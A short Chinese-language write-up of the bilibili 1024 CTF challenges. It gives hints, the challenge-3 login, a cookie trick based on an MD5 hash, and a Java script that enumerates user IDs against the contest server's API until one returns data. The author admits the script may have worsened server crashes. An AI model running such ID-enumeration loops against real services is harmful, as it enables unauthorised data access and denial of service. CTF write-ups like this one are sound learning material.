bilibili security 1024

第一题：

注意题目，页面的背后是什么？所以答案在页面里。

如果直接改User-Agent的话将会得到第二题的答案......

第三题：

user=admin password=bilibili

第四题：

首先提示权限不足，下意识的认为第三题会反admin的cookie之类的东西。结果去第三题找了半天都没找到，看到有人说是Administrator的MD5，好吧...

第五题：

下午去做题的时候服务器崩掉了，就这么请求接口不崩掉才怪......

写了一个demo，异常没有处理直接抛，连接也没关...

public static void main(String[] args) throws IOException {
        //初始化httpclient
        CloseableHttpClient httpClient = HttpClients.createDefault();
        for (int i = 100336889; i < 100336989 ; i++) {
            String url = "http://45.113.201.36/api/ctf/5?uid=" + i;
            HttpGet httpGet = new HttpGet(url);
            httpGet.setHeader("Cookie","");
            //httpGet.setHeader("User-Agent","bilibili Security Browser");
            CloseableHttpResponse response = httpClient.execute(httpGet);
            String httpResp = EntityUtils.toString(response.getEntity());
            JSONObject jsonObject = JSON.parseObject(httpResp);
            String code = jsonObject.get("code").toString();
            if (code.equals("200")){
                System.out.println(jsonObject.get("data").toString());
                return;
            }
        }
    }

第六题：

页面没有打开，服务器可能是又崩掉了。有时间再去看看吧。

（其实我不会php QAQ）